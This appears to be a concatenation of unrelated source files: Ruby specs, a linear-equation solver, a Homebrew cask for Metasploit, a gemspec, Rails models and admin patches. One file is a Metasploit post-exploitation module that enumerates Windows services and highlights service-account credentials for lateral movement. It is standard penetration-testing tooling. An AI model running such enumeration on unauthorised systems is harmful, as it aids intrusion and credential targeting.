    expect(cloud).to receive(:wait_resource).with(volume, :'in-use')
    old_settings = { 'foo' => 'bar'}
    # The registry gains a persistent-disk entry for the new attachment.
    new_settings = {
      'foo' => 'bar',
      'disks' => {
        'persistent' => {
          'v-foobar' => '/dev/sdc'
        }
      }
    }
    expect(@registry).to receive(:read_settings).with('i-test').and_return(old_settings)
    expect(@registry).to receive(:update_settings).with('i-test', new_settings)
    cloud.attach_disk('i-test', 'v-foobar')
  end
  it 'picks available device name' do
    # Letters c and d are taken regardless of the /dev prefix used, so the
    # next free device name is /dev/sde.
    volume_attachments = [{'volumeId' => 'v-c', 'device' => '/dev/vdc'},
                          {'volumeId' => 'v-d', 'device' => '/dev/xvdd'}]
    attachment = double('attachment', :device => '/dev/sdd')
    expect(server).to receive(:volume_attachments).and_return(volume_attachments)
    expect(volume).to receive(:attach).with(server.id, '/dev/sde').and_return(attachment)
    expect(cloud).to receive(:wait_resource).with(volume, :'in-use')
    old_settings = { 'foo' => 'bar'}
    new_settings = {
      'foo' => 'bar',
      'disks' => {
        'persistent' => {
          'v-foobar' => '/dev/sde'
        }
      }
    }
    expect(@registry).to receive(:read_settings).with('i-test').and_return(old_settings)
    expect(@registry).to receive(:update_settings).with('i-test', new_settings)
    cloud.attach_disk('i-test', 'v-foobar')
  end
  it 'raises an error when sdc..sdz are all reserved' do
    volume_attachments = ('c'..'z').inject([]) do |array, char|
      array << {'volumeId' => "v-#{char}", 'device' => "/dev/sd#{char}"}
      array
    end
    expect(server).to receive(:volume_attachments).and_return(volume_attachments)
    expect {
      cloud.attach_disk('i-test', 'v-foobar')
    }.to raise_error(Bosh::Clouds::CloudError, /too many disks attached/)
  end
  it 'bypasses the attaching process when volume is already attached to a server' do
    volume_attachments = [{'volumeId' => 'v-foobar', 'device' => '/dev/sdc'}]
    attachment = double('attachment', :device => '/dev/sdd')
    # No flavor lookup is expected: the volume is found among existing
    # attachments before any device-name computation happens.
    cloud = mock_cloud do |openstack|
      expect(openstack.servers).to receive(:get).with('i-test').and_return(server)
      expect(openstack.volumes).to receive(:get).with('v-foobar').and_return(volume)
    end
    expect(server).to receive(:volume_attachments).and_return(volume_attachments)
    expect(volume).not_to receive(:attach)
    old_settings = { 'foo' => 'bar'}
    new_settings = {
      'foo' => 'bar',
      'disks' => {
        'persistent' => {
          'v-foobar' => '/dev/sdc'
        }
      }
    }
    expect(@registry).to receive(:read_settings).with('i-test').and_return(old_settings)
    expect(@registry).to receive(:update_settings).with('i-test', new_settings)
    cloud.attach_disk('i-test', 'v-foobar')
  end
  # /dev/sda holds the root disk; each of ephemeral disk, swap disk and a
  # config-drive disk shifts the first free letter by one.
  context 'first device name letter' do
    before do
      allow(server).to receive(:volume_attachments).and_return([])
      allow(cloud).to receive(:wait_resource)
      allow(cloud).to receive(:update_agent_settings)
    end
    subject(:attach_disk) { cloud.attach_disk('i-test', 'v-foobar') }
    let(:flavor) { double('flavor', :id => 'f-test', :ephemeral => 0, :swap => '') }
    context 'when there is no ephemeral, swap disk and config drive' do
      it 'return letter b' do
        expect(volume).to receive(:attach).with(server.id, '/dev/sdb')
        attach_disk
      end
    end
    context 'when there is ephemeral disk' do
      let(:flavor) { double('flavor', :id => 'f-test', :ephemeral => 1024, :swap => '') }
      it 'return letter c' do
        expect(volume).to receive(:attach).with(server.id, '/dev/sdc')
        attach_disk
      end
    end
    context 'when there is swap disk' do
      let(:flavor) { double('flavor', :id => 'f-test', :ephemeral => 0, :swap => 200) }
      it 'return letter c' do
        expect(volume).to receive(:attach).with(server.id, '/dev/sdc')
        attach_disk
      end
    end
    context 'when config_drive is set as disk' do
      let(:cloud_options) do
        cloud_options = mock_cloud_options
        cloud_options['properties']['openstack']['config_drive'] = 'disk'
        cloud_options
      end
      it 'returns letter c' do
        expect(volume).to receive(:attach).with(server.id, '/dev/sdc')
        attach_disk
      end
    end
    context 'when there is ephemeral and swap disk' do
      let(:flavor) { double('flavor', :id => 'f-test', :ephemeral => 1024, :swap => 200) }
      it 'returns letter d' do
        expect(volume).to receive(:attach).with(server.id, '/dev/sdd')
        attach_disk
      end
    end
    context 'when there is ephemeral, swap disk and config drive is disk' do
      let(:flavor) { double('flavor', :id => 'f-test', :ephemeral => 1024, :swap => 200) }
      let(:cloud_options) do
        cloud_options = mock_cloud_options
        cloud_options['properties']['openstack']['config_drive'] = 'disk'
        cloud_options
      end
      it 'returns letter e' do
        expect(volume).to receive(:attach).with(server.id, '/dev/sde')
        attach_disk
      end
    end
    context 'when server flavor is not found' do
      let(:flavor) { nil }
      it 'returns letter b' do
        expect(volume).to receive(:attach).with(server.id, '/dev/sdb')
        attach_disk
      end
    end
  end
end
| 33.298969 | 105 | 0.61548 |
f746284063676e767aa6794fb5a6f11955d6992b | 1,457 | require('matrix')
class Cramer
# Solves the 1x1 linear system with coefficient row +row1+ and right-hand
# side +known_term+ using Cramer's rule. Returns a one-element array holding
# the Rational solution. Raises ArgumentError when the determinant is zero.
def self.solution1(row1, known_term)
  coefficients = Matrix.rows([row1])
  det = coefficients.determinant
  raise ArgumentError.new('The determinant is zero!') if det.zero?
  [Rational(Matrix.columns([known_term]).determinant, det)]
end
# Solves the 2x2 linear system with coefficient rows +row1+/+row2+ and
# right-hand side +known_term+ via Cramer's rule: each unknown is the
# determinant of the matrix with that column replaced by +known_term+,
# divided by the coefficient determinant. Returns [x1, x2] as Rationals.
# Raises ArgumentError when the determinant is zero.
def self.solution2(row1, row2, known_term)
  coefficients = Matrix.rows([row1, row2])
  det = coefficients.determinant
  raise ArgumentError.new('The determinant is zero!') if det.zero?
  (0..1).map do |i|
    columns = (0..1).map { |j| j == i ? known_term : coefficients.column(j).to_a }
    Rational(Matrix.columns(columns).determinant, det)
  end
end
# Solves the 3x3 linear system with coefficient rows +row1+..+row3+ and
# right-hand side +known_term+ via Cramer's rule. Returns [x1, x2, x3] as
# Rationals. Raises ArgumentError when the determinant is zero.
def self.solution3(row1, row2, row3, known_term)
  coefficients = Matrix.rows([row1, row2, row3])
  det = coefficients.determinant
  raise ArgumentError.new('The determinant is zero!') if det.zero?
  (0..2).map do |i|
    columns = (0..2).map { |j| j == i ? known_term : coefficients.column(j).to_a }
    Rational(Matrix.columns(columns).determinant, det)
  end
end
end | 21.746269 | 85 | 0.633493 |
0136702d7b840b6a1ad4d69696bb5a4b726df464 | 1,411 | cask 'metasploit' do
  version '4.17.0+20180709104409'
  sha256 '6cf63efd2cd51c58f5bb444ed2c52c0d0ec6a782a32a1b7c8e24773c2e844e6f'
  url "https://osx.metasploit.com/metasploit-framework-#{version}-1rapid7-1.pkg"
  # Upstream publishes the latest version string at this endpoint.
  appcast 'https://osx.metasploit.com/LATEST'
  name 'Metasploit Framework'
  homepage 'https://www.metasploit.com/'
  # Detached signature published next to the pkg; key id belongs to Rapid7.
  gpg "#{url}.asc", key_id: '2007B954'
  depends_on formula: 'nmap'
  # The installer file name uses a space where the version string has '+'.
  pkg "metasploit-framework-#{version.gsub('+', ' ')}-1rapid7-1.pkg"
  # Expose the framework's command-line tools on the user's PATH.
  binary '/opt/metasploit-framework/bin/metasploit-aggregator'
  binary '/opt/metasploit-framework/bin/msfbinscan'
  binary '/opt/metasploit-framework/bin/msfconsole'
  binary '/opt/metasploit-framework/bin/msfd'
  binary '/opt/metasploit-framework/bin/msfdb'
  binary '/opt/metasploit-framework/bin/msfelfscan'
  binary '/opt/metasploit-framework/bin/msfmachscan'
  binary '/opt/metasploit-framework/bin/msfpescan'
  binary '/opt/metasploit-framework/bin/msfrop'
  binary '/opt/metasploit-framework/bin/msfrpc'
  binary '/opt/metasploit-framework/bin/msfrpcd'
  binary '/opt/metasploit-framework/bin/msfupdate'
  binary '/opt/metasploit-framework/bin/msfvenom'
  # msfremove prompts for confirmation; answer "y" and run it with sudo.
  uninstall script: {
                      executable: '/opt/metasploit-framework/bin/msfremove',
                      input: ['y'],
                      sudo: true,
                    },
            rmdir: '/opt/metasploit-framework'
  # Remove per-user state on `brew zap`.
  zap trash: '~/.msf4'
end
| 38.135135 | 80 | 0.693834 |
26a22c8e5feda87003a9770712269c55d7d4c8f1 | 280 | # frozen_string_literal: true
begin
  require 'rspec/core/rake_task'
  # Defines `rake spec:postgres`, which runs only the examples tagged
  # :postgres.
  RSpec::Core::RakeTask.new('spec:postgres'.freeze) do |t|
    t.rspec_opts = '--tag postgres'.freeze
  end
# rubocop:disable Lint/HandleExceptions
rescue LoadError
  # RSpec is not installed (e.g. a production bundle) -- silently skip
  # defining the task.
# rubocop:enable Lint/HandleExceptions
end
| 23.333333 | 58 | 0.757143 |
7ae9e377a60759b200de6a9290c4cb60c67913db | 1,731 | $:.push File.expand_path('../lib', __FILE__)
require 'daylight/version'
# Gem packaging metadata for Daylight.
Gem::Specification.new do |s|
  s.name        = 'daylight'
  s.version     = Daylight::VERSION
  s.platform    = Gem::Platform::RUBY
  s.license     = 'Apache-2.0'
  s.authors     = ['Reid MacDonald', 'Doug McInnes']
  s.email       = ['[email protected]', '[email protected]']
  s.homepage    = 'https://github.com/att-cloud/daylight'
  s.summary     = "Allow ActiveResource to function more like ActiveRecord"
  s.description = <<-DESC
    Daylight extends Rails on the server and ActiveResource in the client to
    allow your ActiveResource client API to perform more like to ActiveRecord
  DESC
  # Runtime dependencies pinned to the versions the gem is tested against.
  s.add_runtime_dependency 'activeresource', '~> 4.0.0'
  s.add_runtime_dependency 'haml', '~> 4.0.5'
  s.add_runtime_dependency 'actionpack-page_caching', '~> 1.0.2'
  s.add_runtime_dependency 'hanna-bootstrap', '~> 0.0.5'
  s.add_runtime_dependency 'active_model_serializers', '~> 0.8.2'
  # Development/test-only dependencies.
  s.add_development_dependency 'rspec'
  s.add_development_dependency 'rspec-rails', '~> 2.14.0'
  s.add_development_dependency 'simplecov-rcov', '~> 0.2.3'
  s.add_development_dependency 'webmock', '~> 1.18.0'
  s.add_development_dependency 'sqlite3'
  s.add_development_dependency 'factory_girl'
  s.add_development_dependency 'faker'
  s.add_development_dependency 'rake'
  # Package the git-tracked sources; executables are basenames under bin/.
  s.files            = `git ls-files -- {app,config,lib,rails}/*`.split("\n")
  s.test_files       = `git ls-files -- spec/*`.split("\n")
  s.executables      = `git ls-files -- bin/*`.split("\n").map{ |f| File.basename(f) }
  s.extra_rdoc_files = `git ls-files -- **/*.md`.split("\n") + %w[README.md]
  s.require_paths    = ['lib']
end
| 44.384615 | 86 | 0.659157 |
ac61c3737f3c5f4a5950317317ca8a6e55f57f90 | 4,322 | ##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex'
class MetasploitModule < Msf::Post
include Msf::Post::Windows::Services
def initialize(info={})
super(update_info(info,
'Name' => "Windows Gather Service Info Enumeration",
'Description' => %q{
This module will query the system for services and display name and
configuration info for each returned service. It allows you to
optionally search the credentials, path, or start type for a string
and only return the results that match. These query operations are
cumulative and if no query strings are specified, it just returns all
services. NOTE: If the script hangs, windows firewall is most likely
on and you did not migrate to a safe process (explorer.exe for
example).
},
'License' => MSF_LICENSE,
'Platform' => ['win'],
'SessionTypes' => ['meterpreter'],
'Author' => ['Keith Faber', 'Kx499']
))
register_options(
[
OptString.new('CRED', [ false, 'String to search credentials for' ]),
OptString.new('PATH', [ false, 'String to search path for' ]),
OptEnum.new('TYPE', [true, 'Service startup Option', 'All', ['All', 'Auto', 'Manual', 'Disabled' ]])
], self.class)
end
def run
# set vars
credentialCount = {}
qcred = datastore["CRED"] || nil
qpath = datastore["PATH"] || nil
if datastore["TYPE"] == "All"
qtype = nil
else
qtype = datastore["TYPE"].downcase
end
if qcred
qcred = qcred.downcase
print_status("Credential Filter: #{qcred}")
end
if qpath
qpath = qpath.downcase
print_status("Executable Path Filter: #{qpath}")
end
if qtype
print_status("Start Type Filter: #{qtype}")
end
results_table = Rex::Text::Table.new(
'Header' => 'Services',
'Indent' => 1,
'SortIndex' => 0,
'Columns' => ['Name', 'Credentials', 'Command', 'Startup']
)
print_status("Listing Service Info for matching services, please wait...")
service_list.each do |srv|
srv_conf = {}
# make sure we got a service name
if srv[:name]
begin
srv_conf = service_info(srv[:name])
if srv_conf[:startname]
# filter service based on filters passed, the are cumulative
if qcred && !srv_conf[:startname].downcase.include?(qcred)
next
end
if qpath && !srv_conf[:path].downcase.include?(qpath)
next
end
# There may not be a 'Startup', need to check nil
if qtype && !(START_TYPE[srv_conf[:starttype]] || '').downcase.include?(qtype)
next
end
# count the occurance of specific credentials services are running as
serviceCred = srv_conf[:startname].upcase
unless serviceCred.empty?
if credentialCount.has_key?(serviceCred)
credentialCount[serviceCred] += 1
else
credentialCount[serviceCred] = 1
# let the user know a new service account has been detected for possible lateral
# movement opportunities
print_good("New service credential detected: #{srv[:name]} is running as '#{srv_conf[:startname]}'")
end
end
results_table << [srv[:name],
srv_conf[:startname],
START_TYPE[srv_conf[:starttype]],
srv_conf[:path]]
end
rescue RuntimeError => e
print_error("An error occurred enumerating service: #{srv[:name]}: #{e}")
end
else
print_error("Problem enumerating service - no service name found")
end
end
print_line results_table.to_s
# store loot on completion of collection
p = store_loot("windows.services", "text/plain", session, results_table.to_s, "windows_services.txt", "Windows Services")
print_good("Loot file stored in: #{p.to_s}")
end
end
| 32.496241 | 125 | 0.578436 |
330ad0c6eabf0395d6e411371cc099cfa865f1ea | 1,155 | module Restfulie
module Common
module Representation
module Atom
class Person < XML
def initialize(node_type, options_or_obj)
if options_or_obj.kind_of?(Hash)
@doc = Nokogiri::XML::Document.new()
node = @doc.create_element(node_type)
node.add_namespace_definition(nil, "http://www.w3.org/2005/Atom")
node.parent = @doc
super(node)
options_or_obj.each do |key,value|
self.send("#{key}=".to_sym, value)
end
else
super(options_or_obj)
end
end
def name
text("name")
end
def name=(value)
set_text("name", value)
end
def uri
text("uri")
end
def uri=(value)
set_text("uri", value)
end
def email
text("email")
end
def email=(value)
set_text("email", value)
end
end
end
end
end
end
| 23.571429 | 79 | 0.440693 |
abfc041562bdeb2c37326391299d0f2ac586b3d3 | 147 | module Taka
module DOM
module HTML
module UListElement
def type
self['type']
end
end
end
end
end
| 12.25 | 25 | 0.52381 |
26321e4dec6a14e2f3be4d55c0eb5d14d94f6e9e | 553 | # frozen_string_literal: true
require 'spec_helper'
# Before running this spec again, you need to set environment variable BOLETOSIMPLES_ACCESS_TOKEN
# Live-API spec (VCR-recorded) for listing bank billet payments.
RSpec.describe BoletoSimples::BankBilletPayment do
  before do
    # Clear the OAuth application credentials so the request authenticates
    # via the BOLETOSIMPLES_ACCESS_TOKEN environment variable alone.
    BoletoSimples.configure do |c|
      c.application_id = nil
      c.application_secret = nil
    end
  end
  describe 'all', vcr: { cassette_name: 'resources/bank_billet_payment/all' } do
    subject { BoletoSimples::BankBilletPayment.all }
    it { expect(subject.first).to be_a_kind_of(BoletoSimples::BankBilletPayment) }
  end
end
| 30.722222 | 97 | 0.759494 |
210effdb128f4f462336bc263b11a07a27c1a53c | 791 | require 'fetchers/base_list_fetcher'
module VCAP::CloudController
class AppUsageEventListFetcher < BaseListFetcher
class << self
def fetch_all(message, dataset)
filter(message, dataset)
end
private
def filter(message, dataset)
if message.requested?(:after_guid)
last_event = dataset.first(guid: message.after_guid[0])
invalid_after_guid! unless last_event
dataset = dataset.filter { id > last_event.id }
end
super(message, dataset, AppUsageEvent)
end
def invalid_after_guid!
raise CloudController::Errors::ApiError.new_from_details(
'UnprocessableEntity',
'After guid filter must be a valid app usage event guid.',
)
end
end
end
end
| 24.71875 | 68 | 0.648546 |
1a17cfeb8e73e67d3339580961c96d4ca36e7864 | 707 | #!/usr/bin/env ruby -w
require 'rmagick'
# Load the source photo; Image.read returns an array, take the first frame.
img = Magick::Image.read('images/Flower_Hat.jpg').first
# Make a watermark from the word "RMagick"
mark = Magick::Image.new(140, 40) {self.background_color = 'none'}
gc = Magick::Draw.new
gc.annotate(mark, 0, 0, 0, -5, 'RMagick') do
  gc.gravity = Magick::CenterGravity
  gc.pointsize = 32
  # Georgia only ships with Windows; fall back to Times elsewhere.
  if RUBY_PLATFORM =~ /mswin32/
    gc.font_family = 'Georgia'
  else
    gc.font_family = 'Times'
  end
  gc.fill = 'white'
  gc.stroke = 'none'
end
# Ripple the text and turn it sideways before compositing.
mark = mark.wave(2.5, 70).rotate(-90)
# Composite the watermark in the lower right (southeast) corner.
img2 = img.watermark(mark, 0.25, 0, Magick::SouthEastGravity)
img2.write('watermark.jpg')
| 25.25 | 67 | 0.660537 |
1ca24ff299ad7ce4acdd2e40dfd574a955799c4c | 633 | require 'drb'
# Benchmark driver: connects to CLIENTS_COUNT DRb worker processes on
# druby://127.0.0.1:1110..1114, pumps task calls through them from one
# thread per worker, and prints elapsed time plus an accumulated checksum
# once TASKS_COUNT results have been collected.
CLIENTS_COUNT = 5
TASKS_COUNT = 100000
DRb.start_service
clients = []
CLIENTS_COUNT.times do |i|
  # Worker i is expected to be listening on port 1110 + i.
  clients << DRbObject.new(nil, "druby://127.0.0.1:111#{i}")
end
puts "start with clients #{clients.size}"
# Shared counters; every client thread updates them under $mutex.
$res = 0
$res_count = 0
$mutex = Mutex.new
tm = Time.now
clients.map do |cl|
  Thread.new do
    data = 0
    loop do
      # Feed the previous result back in as the next task's input.
      data = cl.task(data)
      $mutex.synchronize do
        $res_count += 1
        $res += data
        if $res_count >= TASKS_COUNT
          puts "executed with #{Time.now - tm}, res: #{$res}, res_count: #{$res_count}"
          # Terminate the whole process once the quota is reached.
          exit
        end
      end
    end
  end
end.each &:join
| 18.085714 | 87 | 0.592417 |
1a4dcdfaebf912d7033b3de419471a0a9dd555b2 | 84 | Rails.application.routes.draw do
  # Expose the Marketplace engine's routes under the /marketplace path prefix.
  mount Marketplace::Engine => "/marketplace"
end
| 16.8 | 45 | 0.761905 |
6a57caa670f99a1581a2142743873a0bcd28d232 | 41 | module Whodunnit
  # Gem release version (semantic versioning).
  VERSION = "0.0.5"
end
| 10.25 | 19 | 0.682927 |
f868f57c5daf7c9da57f5944b07f1ad05c6e23a7 | 3,003 | # == Schema Information
#
# Table name: requests
#
# id :bigint not null, primary key
# comments :text
# request_items :jsonb
# status :integer default("pending")
# created_at :datetime not null
# updated_at :datetime not null
# distribution_id :integer
# organization_id :bigint
# partner_id :bigint
#
# A partner's request for items, stored as a JSONB array of
# {item_id, quantity, name} hashes in request_items.
class Request < ApplicationRecord
  include Exportable
  # Raised when a family request references item ids that do not exist.
  class MismatchedItemIdsError < StandardError; end
  belongs_to :partner
  belongs_to :organization
  belongs_to :distribution, optional: true
  enum status: { pending: 0, started: 1, fulfilled: 2 }, _prefix: true
  before_save :sanitize_items_data
  include Filterable
  # add request item scope to allow filtering distributions by request item
  scope :by_request_item_id, ->(item_id) { where("request_items @> :with_item_id ", with_item_id: [{ item_id: item_id.to_i }].to_json) }
  # partner scope to allow filtering by partner
  scope :by_partner, ->(partner_id) { where(partner_id: partner_id) }
  # status scope to allow filtering by status
  scope :by_status, ->(status) { where(status: status) }
  scope :during, ->(range) { where(created_at: range) }
  scope :for_csv_export, ->(organization, *) {
    where(organization: organization)
      .includes(:partner)
      .order(created_at: :desc)
  }
  # Serializes this request in the shape the family-request API expects.
  def family_request_reply
    {
      "organization_id": organization_id,
      "partner_id": partner_id,
      "requested_items": request_items.map do |item|
        {
          "item_id": item['item_id'],
          "count": item['quantity'],
          "item_name": item['name']
        }
      end
    }
  end
  # TODO: Add permission checks for request creation and item lookup
  # Builds an unsaved Request from a family-request payload, scaling each
  # item's default quantity by the requested person_count. Both the payload
  # items and the Item rows are sorted by id so they can be zipped by index;
  # any id mismatch raises MismatchedItemIdsError.
  def self.parse_family_request(family_request)
    request = Request.new(organization_id: family_request['organization_id'], partner_id: family_request['partner_id'])
    requested_items = family_request['requested_items'].sort_by { |item| item['item_id'] }
    request.request_items =
      Item.where(id: requested_items.map { |item| item['item_id'] })
          .order(:id).each.with_index.with_object([]) do |(item, index), request_items|
        unless requested_items[index]['item_id'] == item.id
          raise MismatchedItemIdsError,
                'Item ids should match existing Diaper Base item ids.'
        end
        request_items << {
          item_id: item.id,
          quantity: item.default_quantity * requested_items[index]['person_count'],
          name: item.name
        }
      end
    request
  end
  # Delegates CSV generation for a collection of requests.
  def self.csv_export(requests)
    Exports::ExportRequestService.new(requests).call
  end
  # Total quantity across all requested items.
  def total_items
    request_items.sum { |item| item["quantity"] }
  end
  private
  # Coerces item_id/quantity to integers before save so the JSONB payload
  # is uniformly typed regardless of how the params arrived.
  def sanitize_items_data
    return unless request_items && request_items_changed?
    self.request_items = request_items.map do |item|
      item.merge("item_id" => item["item_id"]&.to_i, "quantity" => item["quantity"]&.to_i)
    end
  end
end
| 31.28125 | 136 | 0.663337 |
b9cb62332eb26b19f14798b179ca15d55a610ff4 | 177 | module GovukContentModels
module ActionProcessors
class ApproveReviewProcessor < BaseProcessor
def process?
requester_different?
end
end
end
end
| 17.7 | 48 | 0.717514 |
e8b81c5e1694c2eec6a86e064b44737425877b5d | 504 | module Driving
class SwitchingLanes
include SimpleIterator
attr_accessor :how
def initialize
@how = [
"When switching lanes it is important to remember the order of operations.",
"First, signal in the direction you would like to move.",
"Next, check your rear view mirror, then the mirror in the direction you are moving, then your blind spot, finally execute the lane switch.",
"Turn off the indicator."
]
@index = -1
end
end
end
| 28 | 150 | 0.660714 |
0893cd5a8da358cc47b3f974d1fd99627fecfdbd | 1,382 | # -*- coding: utf-8 -*-
require 'helper'
# Regression test: a workbook with an embedded straight-with-markers scatter
# chart must match the reference chart_scatter02.xlsx byte layout.
class TestRegressionChartScatter02 < Test::Unit::TestCase
  def setup
    setup_dir_var
  end
  def teardown
    # Remove the generated workbook after each run.
    File.delete(@xlsx) if File.exist?(@xlsx)
  end
  def test_chart_scatter02
    @xlsx = 'chart_scatter02.xlsx'
    workbook = WriteXLSX.new(@xlsx)
    worksheet = workbook.add_worksheet
    chart = workbook.add_chart(
      :type => 'scatter',
      :embedded => 1,
      :subtype => 'straight_with_markers'
    )
    # For testing, copy the randomly generated axis ids in the target xlsx file.
    chart.instance_variable_set(:@axis_ids, [54514816, 45705856])
    data = [
      [ 1, 2, 3, 4, 5 ],
      [ 2, 4, 6, 8, 10 ],
      [ 3, 6, 9, 12, 15 ]
    ]
    worksheet.write('A1', data)
    # Two series sharing the same category column A.
    chart.add_series(
      :categories => '=Sheet1!$A$1:$A$5',
      :values => '=Sheet1!$B$1:$B$5'
    )
    chart.add_series(
      :categories => '=Sheet1!$A$1:$A$5',
      :values => '=Sheet1!$C$1:$C$5'
    )
    worksheet.insert_chart('E9', chart)
    workbook.close
    compare_xlsx_for_regression(File.join(@regression_output, @xlsx), @xlsx)
  end
end
| 27.64 | 80 | 0.484805 |
4aedd89d39ed15f60a8ac4eb14a2a28187298a1b | 1,041 | # Stolen from Technoweenie's restful_authentication
# Teaches the Rails generator Create/Destroy/List commands how to manage a
# singular `map.resource` entry in config/routes.rb.
Rails::Generator::Commands::Create.class_eval do
  # Inserts `map.resource <names>` directly below the routes.draw sentinel
  # line (skipped in --pretend mode; the action is always logged).
  def route_resource(*resources)
    resource_list = resources.map { |r| r.to_sym.inspect }.join(', ')
    sentinel = 'ActionController::Routing::Routes.draw do |map|'
    logger.route "map.resource #{resource_list}"
    unless options[:pretend]
      gsub_file 'config/routes.rb', /(#{Regexp.escape(sentinel)})/mi do |match|
        "#{match}\n  map.resource #{resource_list}\n"
      end
    end
  end
end
Rails::Generator::Commands::Destroy.class_eval do
  # Removes the matching `map.resource` line previously added by Create.
  def route_resource(*resources)
    resource_list = resources.map { |r| r.to_sym.inspect }.join(', ')
    look_for = "\n  map.resource #{resource_list}\n"
    logger.route "map.resource #{resource_list}"
    gsub_file 'config/routes.rb', /(#{look_for})/mi, ''
  end
end
Rails::Generator::Commands::List.class_eval do
  # Dry-run variant: only reports the route that would be added/removed.
  def route_resource(*resources)
    resource_list = resources.map { |r| r.to_sym.inspect }.join(', ')
    logger.route "map.resource #{resource_list}"
  end
end | 34.7 | 79 | 0.690682 |
7a5e33c61babca3e3a19eb6e3d9612859ec25bba | 1,621 | # frozen_string_literal: true
module Ci
class RetryBuildService < ::BaseService
CLONE_ACCESSORS = %i[pipeline project ref tag options name
allow_failure stage stage_id stage_idx trigger_request
yaml_variables when environment coverage_regex
description tag_list protected needs].freeze
def execute(build)
reprocess!(build).tap do |new_build|
build.pipeline.mark_as_processable_after_stage(build.stage_idx)
new_build.enqueue!
MergeRequests::AddTodoWhenBuildFailsService
.new(project, current_user)
.close(new_build)
end
end
# rubocop: disable CodeReuse/ActiveRecord
def reprocess!(build)
unless can?(current_user, :update_build, build)
raise Gitlab::Access::AccessDeniedError
end
attributes = CLONE_ACCESSORS.map do |attribute|
[attribute, build.public_send(attribute)] # rubocop:disable GitlabSecurity/PublicSend
end
attributes.push([:user, current_user])
build.retried = true
Ci::Build.transaction do
# mark all other builds of that name as retried
build.pipeline.builds.latest
.where(name: build.name)
.update_all(retried: true)
create_build!(attributes)
end
end
# rubocop: enable CodeReuse/ActiveRecord
private
def create_build!(attributes)
build = project.builds.new(Hash[attributes])
build.deployment = ::Gitlab::Ci::Pipeline::Seed::Deployment.new(build).to_resource
build.save!
build
end
end
end
| 28.438596 | 93 | 0.660086 |
1ce5abb5e6631379a5d6ef3407db327296371aa9 | 608 | cask "tortoisehg" do
  version "5.9.3"
  sha256 "af0a8fe6cfa41e37e67fa08e0a36eabed20863090f7c266688ff93d6c9d29f9a"
  # Download hosted on mercurial-scm.org rather than the homepage domain,
  # hence the verified: annotation.
  url "https://www.mercurial-scm.org/release/tortoisehg/macos/TortoiseHg-#{version}-mac-x64-qt5.dmg",
      verified: "mercurial-scm.org/release/tortoisehg/"
  name "TortoiseHg"
  desc "Tools for the Mercurial distributed revision control system"
  homepage "https://tortoisehg.bitbucket.io/"
  # Discover new versions by scraping the upstream release directory.
  livecheck do
    url "https://www.mercurial-scm.org/release/tortoisehg/macos/"
    strategy :page_match
    regex(/TortoiseHg-(\d+(?:\.\d+)*)-mac-x64-qt5\.dmg/i)
  end
  app "TortoiseHg.app"
end
| 32 | 101 | 0.733553 |
3385565b348aee474420d1feb02b40df53b9079e | 3,554 | module RailsAdmin
module Config
module Actions
Edit.class_eval do
def self.loading_member
Thread.current[:cenit_pins_off] = true
yield
ensure
Thread.current[:cenit_pins_off] = nil
end
register_instance_option :controller do
proc do
if request.get? # EDIT
if @model_config.asynchronous_persistence
flash[:warning] = "When you save the operation will occurs asynchronous"
end
respond_to do |format|
format.html { render @action.template_name }
format.js { render @action.template_name, layout: false }
end
elsif request.put? # UPDATE
sanitize_params_for!(action = (request.xhr? ? :modal : :update))
@object.set_attributes(form_attributes = params[@abstract_model.param_key])
#Patch
if (synchronized_fields = @model_config.with(object: @object).try(:form_synchronized))
params_to_check = {}
model_config.send(action).with(controller: self, view: view_context, object: @object).fields.each do |field|
if synchronized_fields.include?(field.name.to_sym)
params_to_check[field.name.to_sym] = (field.is_a?(RailsAdmin::Config::Fields::Association) ? field.method_name : field.name).to_s
end
end
params_to_check.each do |field, param|
@object.send("#{field}=", nil) unless form_attributes[param].present?
end
end
@authorization_adapter && @authorization_adapter.attributes_for(:update, @abstract_model).each do |name, value|
@object.send("#{name}=", value)
end
changes = @object.changes
#Patch
save_options = {}
if (model = @abstract_model.model).is_a?(Class) && model < FieldsInspection
save_options[:inspect_fields] = Account.current.nil? || !::User.current_super_admin?
end
ok =
begin
if @model_config.asynchronous_persistence
do_flash_process_result ::Setup::AsynchronousPersistence.process(
model_name: @abstract_model.model_name,
id: @object.id,
attributes: @object.attributes,
options: save_options
)
true
else
@object.save(save_options)
end
rescue Exception => ex
@object.errors.add(:base, "Error while updating: #{ex.message}")
false
end
if ok
if (warnings = @object.try(:warnings)).present?
do_flash(:warning, 'Warning', warnings)
end
@auditing_adapter && @auditing_adapter.update_object(@object, @abstract_model, _current_user, changes)
respond_to do |format|
format.html { redirect_to_on_success(skip_flash: @model_config.asynchronous_persistence) }
format.js { render json: { id: @object.id.to_s, label: @model_config.with(object: @object).object_label } }
end
else
handle_save_error :edit
end
end
end
end
end
end
end
end
| 39.488889 | 149 | 0.535734 |
6298344c7b5e6c5914994619bdb1a3d1d723156c | 118 | require 'json_to_csv/version'
require 'json_to_csv/convert'
# Namespace for the json_to_csv gem.
module JsonToCsv
  # Base error class for gem-specific failures; rescue this to catch any
  # error raised by the gem.
  Error = Class.new(StandardError)
end
| 14.75 | 34 | 0.79661 |
1d7874c0dfc6a9cb799e0f7a16e1d7f60a336503 | 152 | class QuestionPolicy < InstrumentPolicy
attr_reader :user, :record
# Builds a policy for +user+ acting on the question +record+,
# exposing both through the class-level attr_readers.
def initialize(user, record)
  @user, @record = user, record
end
end | 16.888889 | 40 | 0.690789 |
18044a5e98e383a320f2b4a64c0f0494475b728c | 3,774 | Template_stservice = <<-EOS
EOS
# #ifndef INCLUDED_MBED
# #include "mbed.h"
# #endif
# #ifndef INCLUDED_BLEDEVICE
# #include "BLEDevice.h"
# #endif
# /*
# * Power control service
# * Service_Uuid: 0xFF00
# */
# static const uint16_t power_control_char_uuid = 0xFF00;
# uint8_t power_control_char_value[8] = {0,};
# GattCharacteristic PowerControlChar(
# power_control_char_uuid,
# power_control_char_value,
# sizeof(power_control_char_value),
# sizeof(power_control_char_value),
# GattCharacteristic::BLE_GATT_CHAR_PROPERTIES_READ |
# GattCharacteristic::BLE_GATT_CHAR_PROPERTIES_WRITE
# );
# static const uint16_t power_state_char_uuid = 0xFF01;
# uint8_t power_state_char_value[8] = {0x41,0x42,0x43};
# GattCharacteristic PowerStateChar(
# power_state_char_uuid,
# power_state_char_value,
# sizeof(power_control_char_value),
# sizeof(power_control_char_value),
# GattCharacteristic::BLE_GATT_CHAR_PROPERTIES_READ
